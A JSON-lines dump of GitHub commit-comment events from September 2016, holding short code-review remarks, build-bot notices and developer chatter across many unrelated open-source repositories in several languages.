{"id":"4555344377","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/libmateweather"},"payload":{"comment":{"id":19000809,"position":null,"line":null,"path":null,"commit_id":"835055e0d0b950d3f66ad236de7e40942f6f7d8e","created_at":"2016-09-13T12:45:05Z","updated_at":"2016-09-13T12:45:05Z","body":"Yes, I have that in my plans, but only after mate-panel and mate-applets will be build with GTK+3 only."}},"created_at":"2016-09-13T12:45:05Z"}
{"id":"4555347682","type":"CommitCommentEvent","actor":{"login":"codingforfun"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19000816,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T12:45:45Z","updated_at":"2016-09-13T12:45:45Z","body":"Ok. So how can we get this working again? \r\nI think it's necessary to check with `git blame` or `bisect` to identify the failing commits and try to fix or contact the original authors.\r\n\r\nThe current state isn't really very helpful because it breaks all tests for pull requests based OCB/7.0 after your commit which basically makes creating them useless because no one will ever merge PR with broken builds I think even if the PR itself isn't the cause for this. "}},"created_at":"2016-09-13T12:45:45Z"}
{"id":"4555354168","type":"CommitCommentEvent","actor":{"login":"olegendo"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19000831,"position":16,"line":2027,"path":"gcc/ams.cc","commit_id":"c80f934150e34da4544cc9bc1e223d5a238d775a","created_at":"2016-09-13T12:47:06Z","updated_at":"2016-09-13T12:47:06Z","body":"Here are 3 map lookups via \"reg_use_count[rm->reg ()]\".  I'd suggest to do the lookup only once and get the std::pair<rtx, int>& into a local variable."}},"created_at":"2016-09-13T12:47:06Z"}
{"id":"4555357512","type":"CommitCommentEvent","actor":{"login":"olegendo"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19000835,"position":29,"line":2040,"path":"gcc/ams.cc","commit_id":"c80f934150e34da4544cc9bc1e223d5a238d775a","created_at":"2016-09-13T12:47:46Z","updated_at":"2016-09-13T12:47:46Z","body":"Redundant map lookup here, too ..."}},"created_at":"2016-09-13T12:47:46Z"}
{"id":"4555359258","type":"CommitCommentEvent","actor":{"login":"banoresaurabh"},"repo":{"name":"banoresaurabh/Drug-store-app"},"payload":{"comment":{"id":19000837,"position":246,"line":246,"path":"final/exp.Designer.cs","commit_id":"6ccbde698cb0072c2b38674d1860f96e2ea18c3c","created_at":"2016-09-13T12:48:09Z","updated_at":"2016-09-13T12:48:09Z","body":"Close2 is the name of the image I attached in the picturebox...."}},"created_at":"2016-09-13T12:48:09Z"}
{"id":"4555364049","type":"CommitCommentEvent","actor":{"login":"k9ert"},"repo":{"name":"hybris/zenboot"},"payload":{"comment":{"id":19000841,"position":3,"line":3,"path":"test/common/org/zenboot/portal/pages/IndexPage.groovy","commit_id":"0147a1bae52c3034cbf459b1fb92ee112bdad77e","created_at":"2016-09-13T12:49:07Z","updated_at":"2016-09-13T12:49:07Z","body":"strange import-classnames?! I guess that's somehow Frontend-UI best practise someone is convinced of?"}},"created_at":"2016-09-13T12:49:07Z"}
{"id":"4555365083","type":"CommitCommentEvent","actor":{"login":"ADmad"},"repo":{"name":"josegonzalez/cakephp-upload"},"payload":{"comment":{"id":19000842,"position":4,"line":20,"path":"README.md","commit_id":"5dc6c1caf0d306e8aa8f3c3773a1b9bf9a0e9bef","created_at":"2016-09-13T12:49:18Z","updated_at":"2016-09-13T12:49:18Z","body":":stuck_out_tongue_closed_eyes: "}},"created_at":"2016-09-13T12:49:18Z"}
{"id":"4555366405","type":"CommitCommentEvent","actor":{"login":"kasperiks"},"repo":{"name":"kasperiks/training1C"},"payload":{"comment":{"id":19000844,"position":null,"line":null,"path":null,"commit_id":"7634702acb6f020489ccf0f89d6c956fdd021f74","created_at":"2016-09-13T12:49:33Z","updated_at":"2016-09-13T12:49:33Z","body":"\r\nПроверка комита"}},"created_at":"2016-09-13T12:49:33Z"}
{"id":"4555367224","type":"CommitCommentEvent","actor":{"login":"CarlinhosSousaJunior"},"repo":{"name":"CarlinhosSousaJunior/GestorEstoque"},"payload":{"comment":{"id":19000845,"position":null,"line":null,"path":null,"commit_id":"561746d9d35eb5398b2760ad1ce1762c4d926b5c","created_at":"2016-09-13T12:49:43Z","updated_at":"2016-09-13T12:49:43Z","body":"Geladeira.consertar();"}},"created_at":"2016-09-13T12:49:43Z"}
{"id":"4555371145","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19000853,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T12:50:29Z","updated_at":"2016-09-13T12:50:29Z","body":"that's the reason we often have 'travis errors unrelated' in comments.\r\n\r\nAs for fixing travis: Something seems to blow up in document_ftp. Simplest way is to add this module to the exclude variable and whoever is interested in having tests for this module activated again is cordially invited to PR a fix. I *assume* this is some library version issue, but don't have time to debug this right now."}},"created_at":"2016-09-13T12:50:29Z"}
{"id":"4555373749","type":"CommitCommentEvent","actor":{"login":"AlxndrBo"},"repo":{"name":"AlxndrBo/bot_kitvk"},"payload":{"comment":{"id":19000863,"position":null,"line":null,"path":null,"commit_id":"7ea1f657e4431ed62959ece4726a0b8ad622e9c1","created_at":"2016-09-13T12:50:58Z","updated_at":"2016-09-13T12:50:58Z","body":"Поправил регулярку, которая парсит ссылки на профиль стима. (Не видела символ -, также добавил ~ и . на всяк случай). \r\nДобавил обработку исключений при обработке ответа стима."}},"created_at":"2016-09-13T12:50:58Z"}
{"id":"4555376777","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19000870,"position":null,"line":null,"path":null,"commit_id":"2081e14031852b3440474146649000f8559f73db","created_at":"2016-09-13T12:51:33Z","updated_at":"2016-09-13T12:51:33Z","body":"Thanks."}},"created_at":"2016-09-13T12:51:33Z"}
{"id":"4555378494","type":"CommitCommentEvent","actor":{"login":"nosph"},"repo":{"name":"lifeisgame2016/JEnterprise"},"payload":{"comment":{"id":19000876,"position":23,"line":39,"path":"com/javaee/generics/mod2/ExecutorImpl.java","commit_id":"5d0f92bf75738a22be0fd6ddfdc054d9fbefce1c","created_at":"2016-09-13T12:51:53Z","updated_at":"2016-09-13T12:51:53Z","body":"`Map.Entry<? extends Task<? extends T>, ? extends Validator<? super T>>`\r\n`? extends` - лишнее"}},"created_at":"2016-09-13T12:51:53Z"}
{"id":"4555379380","type":"CommitCommentEvent","actor":{"login":"rameshkunwar"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19000880,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2016-09-13T12:52:02Z","updated_at":"2016-09-13T12:52:02Z","body":"Hi Mosh,\r\nIn Details.cshtml, you have included \"if\" statement. \r\n` @if (Model.Birthdate.HasValue)\r\n    {\r\n        <li>Birthdate: @Model.Birthdate.Value.ToShortDateString()</li>\r\n   }`\r\nIs it not against the norm of MVC principle to have logic inside View?"}},"created_at":"2016-09-13T12:52:02Z"}
{"id":"4555379685","type":"CommitCommentEvent","actor":{"login":"HYEJIN2013"},"repo":{"name":"lukakim/whiteproject"},"payload":{"comment":{"id":19000882,"position":null,"line":null,"path":null,"commit_id":"fe0296508d5c5dca5fc1d4b336842408c13a02ce","created_at":"2016-09-13T12:52:07Z","updated_at":"2016-09-13T12:52:07Z","body":"return 0;"}},"created_at":"2016-09-13T12:52:07Z"}
{"id":"4555379708","type":"CommitCommentEvent","actor":{"login":"jbialobr"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":19000883,"position":null,"line":null,"path":null,"commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-13T12:52:07Z","updated_at":"2016-09-13T12:52:07Z","body":"Consider making `ConEmuStartInfo.ConsoleProcessCommandLine` of the new type (CommandLineBuilder) instead of string. It will give a hint that the ConsoleProcessCommandLine has to be escaped."}},"created_at":"2016-09-13T12:52:07Z"}
{"id":"4555381162","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19000885,"position":null,"line":null,"path":null,"commit_id":"b74c8cba4da03aeabf3b0aafb05ed95b7099abdb","created_at":"2016-09-13T12:52:22Z","updated_at":"2016-09-13T12:52:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 985](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13174&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T12:52:22Z"}
{"id":"4555381770","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000886,"position":null,"line":null,"path":null,"commit_id":"a880d87464f1c8360be3f3998c7fb4e3fe0b19e8","created_at":"2016-09-13T12:52:29Z","updated_at":"2016-09-13T12:52:29Z","body":"But given that we can dominate player units, we can't just let them through PetAI and the creature part of PetHandler or we may be finding ourselves crashing much like we used to with Mind Control =/"}},"created_at":"2016-09-13T12:52:29Z"}
{"id":"4555384946","type":"CommitCommentEvent","actor":{"login":"dp901"},"repo":{"name":"dp901/Fayde"},"payload":{"comment":{"id":19000906,"position":null,"line":null,"path":null,"commit_id":"210aa21989c03d03ba66a912c91a7d04b7724304","created_at":"2016-09-13T12:53:03Z","updated_at":"2016-09-13T12:53:03Z","body":"When a ListBox contains items that are not of type ListBoxItem then scrolling causes item selection. "}},"created_at":"2016-09-13T12:53:03Z"}
{"id":"4555386186","type":"CommitCommentEvent","actor":{"login":"codingforfun"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19000912,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T12:53:18Z","updated_at":"2016-09-13T12:53:18Z","body":"Just linking the discussion to the original PR for reference https://github.com/OCA/OCB/pull/469"}},"created_at":"2016-09-13T12:53:18Z"}
{"id":"4555388003","type":"CommitCommentEvent","actor":{"login":"marvinthepa"},"repo":{"name":"hybris/zenboot"},"payload":{"comment":{"id":19000915,"position":4,"line":3,"path":".travis.yml","commit_id":"cb5657aa44b5565e65150df94969afbb11b81c4f","created_at":"2016-09-13T12:53:38Z","updated_at":"2016-09-13T12:53:38Z","body":"The Docker image always used oracle jdk, so I thought it was a good idea to also build with it.."}},"created_at":"2016-09-13T12:53:38Z"}
{"id":"4555388749","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19000918,"position":null,"line":null,"path":null,"commit_id":"b74c8cba4da03aeabf3b0aafb05ed95b7099abdb","created_at":"2016-09-13T12:53:46Z","updated_at":"2016-09-13T12:53:46Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 985](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13174&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:23"}},"created_at":"2016-09-13T12:53:46Z"}
{"id":"4555388797","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000919,"position":null,"line":null,"path":null,"commit_id":"704cbb79a9acfce97ef75b1ada46f25d38212abf","created_at":"2016-09-13T12:53:47Z","updated_at":"2016-09-13T12:53:47Z","body":"But we may want to think about where we place mini pets as well as creatures/players we dominate as pets through items like Gnomish Mind control cap, before I push this...?"}},"created_at":"2016-09-13T12:53:47Z"}
{"id":"4555389632","type":"CommitCommentEvent","actor":{"login":"QAston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19000922,"position":53,"line":118,"path":"src/server/scripts/Northrend/VaultOfArchavon/instance_vault_of_archavon.cpp","commit_id":"fab78d5e02ddaab3e4cfeee5ffb9b00f882be248","created_at":"2016-09-13T12:53:56Z","updated_at":"2016-09-13T12:53:56Z","body":"indeed, can be safely dropped"}},"created_at":"2016-09-13T12:53:56Z"}
{"id":"4555396402","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"Studiosixer/GitLink"},"payload":{"comment":{"id":19000937,"position":8,"line":225,"path":"src/GitLink/Linker.cs","commit_id":"c67bf7cb7fadba1315364a6d2f97237a3fd32315","created_at":"2016-09-13T12:55:15Z","updated_at":"2016-09-13T12:55:15Z","body":"Name.EqualsIgnoreCase(\"VisualStudioTeamServicesProvider\")"}},"created_at":"2016-09-13T12:55:15Z"}
{"id":"4555399528","type":"CommitCommentEvent","actor":{"login":"codingforfun"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19000947,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T12:55:48Z","updated_at":"2016-09-13T12:55:48Z","body":"Do I understand you correctly that it would be OK to make another PR that is just adding `document_ftp` to the exclude variable? "}},"created_at":"2016-09-13T12:55:48Z"}
{"id":"4555403798","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19000956,"position":null,"line":null,"path":null,"commit_id":"a92a9bad5f80526b130a782ef94fb2888a0fa57f","created_at":"2016-09-13T12:56:38Z","updated_at":"2016-09-13T12:56:38Z","body":"Build report #159583565 for sha a92a9bad5f80526b130a782ef94fb2888a0fa57f:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-11.19%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1808%20/%208426%20%2821.46%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-17.54%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-13T12:56:38Z"}
{"id":"4555404857","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"applqpak/BasicForum"},"payload":{"comment":{"id":19000959,"position":null,"line":null,"path":null,"commit_id":"a8a34911d50dc12998ffa0f3410ab0eedcabfaa4","created_at":"2016-09-13T12:56:50Z","updated_at":"2016-09-13T12:56:50Z","body":"same"}},"created_at":"2016-09-13T12:56:50Z"}
{"id":"4555407075","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19000962,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T12:57:16Z","updated_at":"2016-09-13T12:57:16Z","body":"> I would assume both values are the default and so the entries can be removed?\r\n\r\nDefault for CONFIG_SY8106A_VOUT1_VOLT is 1200\r\nDefault for CONFIG_SYS_CLK_FREQ is 1008000000"}},"created_at":"2016-09-13T12:57:16Z"}
{"id":"4555408661","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":19000965,"position":null,"line":null,"path":null,"commit_id":"b1fd75a11b06dd0f5c9a98cc3a784e57a8f4368b","created_at":"2016-09-13T12:57:33Z","updated_at":"2016-09-13T12:57:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vFPfq9hS&#x2F;18-todos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> todos</a>"}},"created_at":"2016-09-13T12:57:33Z"}
{"id":"4555410212","type":"CommitCommentEvent","actor":{"login":"AndrewSamokhvalov"},"repo":{"name":"lightningnetwork/lnd"},"payload":{"comment":{"id":19000971,"position":14,"line":490,"path":"lnwallet/wallet.go","commit_id":"49ce1040d410b018bee44679206f89ba60b859af","created_at":"2016-09-13T12:57:50Z","updated_at":"2016-09-13T12:57:50Z","body":"Hi @Roasbeef ! After [merge](https://github.com/lightningnetwork/lnd/pull/35) with `master` branch I found that now total capacity not equal of amount that is sent in open channel request, but equal `totalCapacity := req.capacity + commitFee`, so should I now consider the `commitFee` too?"}},"created_at":"2016-09-13T12:57:50Z"}
{"id":"4555412556","type":"CommitCommentEvent","actor":{"login":"nosph"},"repo":{"name":"sevladmain/HW3"},"payload":{"comment":{"id":19000975,"position":10,"line":30,"path":"src/com/goit/ee/module2/ExecutorImpl.java","commit_id":"88c1524b086f14b6bdaa76ca240a62ed9daba620","created_at":"2016-09-13T12:58:19Z","updated_at":"2016-09-13T12:58:19Z","body":"Всё бы хорошо, но generics и wildcards придумали для того чтоб избежать приведение типов, обойти этот момент. От этих приведений надо избавиться."}},"created_at":"2016-09-13T12:58:19Z"}
{"id":"4555412815","type":"CommitCommentEvent","actor":{"login":"nosph"},"repo":{"name":"sevladmain/HW3"},"payload":{"comment":{"id":19000976,"position":22,"line":39,"path":"src/com/goit/ee/module2/ExecutorImpl.java","commit_id":"88c1524b086f14b6bdaa76ca240a62ed9daba620","created_at":"2016-09-13T12:58:21Z","updated_at":"2016-09-13T12:58:21Z","body":"То же самое"}},"created_at":"2016-09-13T12:58:21Z"}
{"id":"4555414105","type":"CommitCommentEvent","actor":{"login":"soniCaH"},"repo":{"name":"capacity4dev/capacity4more"},"payload":{"comment":{"id":19000981,"position":14,"line":314,"path":"project/profiles/capacity4more/modules/c4m/og/c4m_og/c4m_og.module","commit_id":"a4f914b0aa8c7ec45ab3b3d1c581ffa4a84669bd","created_at":"2016-09-13T12:58:34Z","updated_at":"2016-09-13T12:58:34Z","body":"@ordavidil could you review if this is properly solved in https://github.com/capacity4dev/capacity4more/pull/1300/files ??"}},"created_at":"2016-09-13T12:58:34Z"}
{"id":"4555425175","type":"CommitCommentEvent","actor":{"login":"BenDaviesGFX"},"repo":{"name":"BenDaviesGFX/Chaos"},"payload":{"comment":{"id":19001004,"position":null,"line":null,"path":null,"commit_id":"7e9e5e2faa947d3e5f9d4194ff90b73f2af9c013","created_at":"2016-09-13T13:00:45Z","updated_at":"2016-09-13T13:00:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XpJKtuBB&#x2F;10-level-renderer\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Level Renderer</a>"}},"created_at":"2016-09-13T13:00:45Z"}
{"id":"4555426866","type":"CommitCommentEvent","actor":{"login":"hggomes"},"repo":{"name":"RMerl/asuswrt-merlin"},"payload":{"comment":{"id":19001009,"position":null,"line":null,"path":null,"commit_id":"fb3ef8754b50156201ebf9cc39e9c48ede45759d","created_at":"2016-09-13T13:01:04Z","updated_at":"2016-09-13T13:01:04Z","body":"\\o/"}},"created_at":"2016-09-13T13:01:04Z"}
{"id":"4555427401","type":"CommitCommentEvent","actor":{"login":"cyberwolf"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19001011,"position":8,"line":85,"path":"profiles/common/modules/custom/nexteuropa_token/src/Entity/ViewModeTokenHandler.php","commit_id":"2c7103811dd6211c472eb73a649fc0a8a24aba15","created_at":"2016-09-13T13:01:12Z","updated_at":"2016-09-13T13:01:12Z","body":"This introduces a dependency of nexteuropa_token on webtools, I am unsure if this is wanted."}},"created_at":"2016-09-13T13:01:12Z"}
{"id":"4555427473","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"EDDiscovery/EDDiscovery"},"payload":{"comment":{"id":19001012,"position":null,"line":null,"path":null,"commit_id":"73bc0e70bb180601fdb2abeb64db27bb468a3ae2","created_at":"2016-09-13T13:01:13Z","updated_at":"2016-09-13T13:01:13Z","body":"Probably yes, I haven't tried it for ages anyway... I still don't really like Mono though, I was waiting for native dotnet support, but the port was incomplete last time I checked, not sure what's current state."}},"created_at":"2016-09-13T13:01:13Z"}
{"id":"4555428122","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19001014,"position":18,"line":27,"path":"theatre.rb","commit_id":"d22ae670c560981c9c15a792f5cdd64a2beebcc5","created_at":"2016-09-13T13:01:21Z","updated_at":"2016-09-13T13:01:21Z","body":"А объекты и классы нам на что даны? Почему тут не сделать что-то типа `@periods.any? { |other| other.intersects?(current) }`\r\n(И имена переменных v и p меня смущают!)"}},"created_at":"2016-09-13T13:01:21Z"}
{"id":"4555429123","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":19001017,"position":null,"line":null,"path":null,"commit_id":"9655bb7afe345802a5e33b5d2f2cbb4d3306141b","created_at":"2016-09-13T13:01:31Z","updated_at":"2016-09-13T13:01:31Z","body":"@rapperskull technically we could indeed keep it in the super package.\r\nBut the app did not have any update since 2013 anymore, and its functionality is dependent on, but meanwhile also replaced by, the Google App.\r\nAlso it has not been bundled on any recent Marshmallow ROMs anymore, and I think Google probably does not suport it anymore and might even drop compatbility.\r\nImho the very small set users that still might want this, would probably want it from the Play Store for the time being."}},"created_at":"2016-09-13T13:01:31Z"}
{"id":"4555431147","type":"CommitCommentEvent","actor":{"login":"GeamFelipeDosSantos"},"repo":{"name":"CarlinhosSousaJunior/GestorEstoque"},"payload":{"comment":{"id":19001023,"position":null,"line":null,"path":null,"commit_id":"561746d9d35eb5398b2760ad1ce1762c4d926b5c","created_at":"2016-09-13T13:01:53Z","updated_at":"2016-09-13T13:01:53Z","body":"Kkkkk\n\nEm 13 de set de 2016 9:49 AM, \"CarlinhosSousaJunior\" <\nnotifications@github.com> escreveu:\n\n> Geladeira.consertar();\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CarlinhosSousaJunior/GestorEstoque/commit/561746d9d35eb5398b2760ad1ce1762c4d926b5c#commitcomment-19000845>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQ-sTd0eKpD7E2kKyH88y_Xxd1JBN3ARks5qppvngaJpZM4J7ocU>\n> .\n>\n"}},"created_at":"2016-09-13T13:01:53Z"}
{"id":"4555431721","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19001027,"position":11,"line":21,"path":"theatre.rb","commit_id":"d22ae670c560981c9c15a792f5cdd64a2beebcc5","created_at":"2016-09-13T13:02:00Z","updated_at":"2016-09-13T13:02:00Z","body":"Кстати, этот if не нужен — с пустым массивом `any?` прекрасно справится и вернёт `false`."}},"created_at":"2016-09-13T13:02:00Z"}
{"id":"4555431978","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19001029,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-13T13:02:03Z","updated_at":"2016-09-13T13:02:03Z","body":"dat number"}},"created_at":"2016-09-13T13:02:03Z"}
{"id":"4555437283","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19001037,"position":65,"line":86,"path":"theatre.rb","commit_id":"d22ae670c560981c9c15a792f5cdd64a2beebcc5","created_at":"2016-09-13T13:03:02Z","updated_at":"2016-09-13T13:03:02Z","body":"Ну нет, запихивать глубоко внутрь бизнес-логики общение с пользователем — это нехорошо."}},"created_at":"2016-09-13T13:03:02Z"}
{"id":"4555443488","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":19001051,"position":175,"line":175,"path":"src/plugins/fcrypt/fcrypt.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-13T13:04:15Z","updated_at":"2016-09-13T13:04:15Z","body":"Do you still use the wrong placements? (Above it says postcommit.)\r\n`keyString (parentKey)` should contain the temporary file save to be modified. Only after commit it contains the name of the final file, which should not be modified anymore.\r\n\r\nHow should it work if you simply remove the file?"}},"created_at":"2016-09-13T13:04:15Z"}
{"id":"4555447926","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19001058,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-13T13:04:55Z","updated_at":"2016-09-13T13:04:55Z","body":"\r\n![](https://upload.wikimedia.org/wikipedia/en/3/32/IronMaiden_NumberOfBeast.jpg)\r\n"}},"created_at":"2016-09-13T13:04:55Z"}
{"id":"4555449856","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001061,"position":1,"line":1,"path":"README.md","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:05:17Z","updated_at":"2016-09-13T13:05:17Z","body":"Please describe termcase."}},"created_at":"2016-09-13T13:05:17Z"}
{"id":"4555450662","type":"CommitCommentEvent","actor":{"login":"sickboy"},"repo":{"name":"SIXNetworks/withSIX.Synqer"},"payload":{"comment":{"id":19001067,"position":null,"line":null,"path":null,"commit_id":"139373ebb6ecad57f35bde4fb3575a91171b0cac","created_at":"2016-09-13T13:05:25Z","updated_at":"2016-09-13T13:05:25Z","body":"SIXNetworks/withSIX-Platform#258"}},"created_at":"2016-09-13T13:05:25Z"}
{"id":"4555451271","type":"CommitCommentEvent","actor":{"login":"sickboy"},"repo":{"name":"SIXNetworks/withSIX.Synqer"},"payload":{"comment":{"id":19001068,"position":null,"line":null,"path":null,"commit_id":"16f41b540a372bbbda2ed1a969018d0006ece961","created_at":"2016-09-13T13:05:32Z","updated_at":"2016-09-13T13:05:32Z","body":"SIXNetworks/withSIX-Platform#258"}},"created_at":"2016-09-13T13:05:32Z"}
{"id":"4555454347","type":"CommitCommentEvent","actor":{"login":"averissimo"},"repo":{"name":"yakyak/yakyak"},"payload":{"comment":{"id":19001075,"position":null,"line":null,"path":null,"commit_id":"01f2e57d7873d0ffb55c3f1a5158bc186de589a6","created_at":"2016-09-13T13:06:09Z","updated_at":"2016-09-13T13:06:09Z","body":"yay!"}},"created_at":"2016-09-13T13:06:09Z"}
{"id":"4555457441","type":"CommitCommentEvent","actor":{"login":"jmaliska"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19001090,"position":null,"line":null,"path":null,"commit_id":"deb4b74bc9a41fabc6e89d55e97dbd00cb74d024","created_at":"2016-09-13T13:06:43Z","updated_at":"2016-09-13T13:06:43Z","body":"Looks like this commit broken my librenms installation. After updating to this commit, I can't see any devices, services, ports, settings, etc. Everything is empty on the dashboard. Just for info I'm using AD authentication."}},"created_at":"2016-09-13T13:06:43Z"}
{"id":"4555458310","type":"CommitCommentEvent","actor":{"login":"mermshaus"},"repo":{"name":"php-de/php-de.github.io"},"payload":{"comment":{"id":19001092,"position":null,"line":null,"path":null,"commit_id":"fdb126887deaa71ee5e73a4a12b57a8d035cb688","created_at":"2016-09-13T13:06:54Z","updated_at":"2016-09-13T13:06:54Z","body":"Ich habe es auf ein helles Theme geändert (b612936). Ist das so erst mal in Ordnung? Genau auf das Bootstrap-Theme würde ich ungern zurück, weil ich das sehr schlecht lesbar finde, da es [so wenig Kontrast](http://getbootstrap.com/css/#grid-media-queries) hat. Klar liegt das auch teilweise an meiner Hardware hier, aber dennoch."}},"created_at":"2016-09-13T13:06:54Z"}
{"id":"4555458824","type":"CommitCommentEvent","actor":{"login":"corporateshark"},"repo":{"name":"corporateshark/WCMCommander"},"payload":{"comment":{"id":19001093,"position":12,"line":888,"path":"src/wcm-config.cpp","commit_id":"970c471af1279918a2f0efdebd2bd5f7916c2b62","created_at":"2016-09-13T13:07:01Z","updated_at":"2016-09-13T13:07:01Z","body":"A bug..."}},"created_at":"2016-09-13T13:07:01Z"}
{"id":"4555459030","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001095,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:07:03Z","updated_at":"2016-09-13T13:07:03Z","body":"What's the use of this file ?"}},"created_at":"2016-09-13T13:07:03Z"}
{"id":"4555460011","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001101,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:07:15Z","updated_at":"2016-09-13T13:07:15Z","body":"What's the use of this file ?"}},"created_at":"2016-09-13T13:07:15Z"}
{"id":"4555462279","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001107,"position":2,"line":2,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:07:39Z","updated_at":"2016-09-13T13:07:39Z","body":"About the file ?"}},"created_at":"2016-09-13T13:07:39Z"}
